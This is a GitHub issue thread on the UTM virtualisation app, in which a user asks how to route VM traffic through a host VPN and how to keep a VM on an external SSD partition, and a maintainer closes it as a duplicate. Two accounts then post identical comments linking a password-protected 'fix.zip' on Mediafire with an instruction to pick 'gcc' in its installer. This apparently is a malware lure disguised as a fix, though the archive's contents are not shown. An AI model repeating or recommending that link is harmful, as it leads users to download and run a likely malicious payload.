### ISSUE TITLE
Please help me with installation

### ISSUE THREAD

**Issue by Tropical-Smootie** [utmapp/UTM#6625] opened 2024-08-26 06:14 UTC
2 issues 

        1 i need to figure out how to route traffic to the vm while using a vpn on the host machine

        2 I need to figure out how to store the vm and and its components in a premade and labeled partition in an external ssd drive. and be able to boot the vm from that location. 

**Configuration**  
* UTM Version: Version 4.5.3 (99)
* macOS Version: Sonoma 14.6.1 
* Mac Chip (Intel, M1, ...):  M2

**Comment by osy** [comment] 2024-08-26 06:28
Duplicate of #3634

**Closed by osy** 2024-08-26 06:28 UTC

**Comment by HaxBaba123** [comment] 2024-08-26 06:39
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment] 2024-08-26 06:42
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tropical-Smootie** [comment] 2024-09-09 03:27
> Duplicate of #3634

I need to know how to store and load my vm from a partition on an external ssd
